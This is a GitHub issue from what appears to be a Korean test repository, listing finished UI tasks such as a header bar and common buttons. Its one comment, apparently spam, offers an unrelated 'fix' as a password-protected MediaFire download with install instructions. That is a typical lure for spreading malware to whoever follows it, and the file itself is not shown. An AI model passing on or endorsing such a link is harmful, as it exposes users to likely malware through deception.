### ISSUE TITLE
style: 공통컴포넌트 작업

### ISSUE THREAD

**Issue by deswaq1220** [Prefitt-11-supreme/test#2]
### Describe  
> describe

### Todo
- [x] 헤더바 작업
- [x] 공통 버튼 작업
- [x] todo3

### ETC
> etc

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
